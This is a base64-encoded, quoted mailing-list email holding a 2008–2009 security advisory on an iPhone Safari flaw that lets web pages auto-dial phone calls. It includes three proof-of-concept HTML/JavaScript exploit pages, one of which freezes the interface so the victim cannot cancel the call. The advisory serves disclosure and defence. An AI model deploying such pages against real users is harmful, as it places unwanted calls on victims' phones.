ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--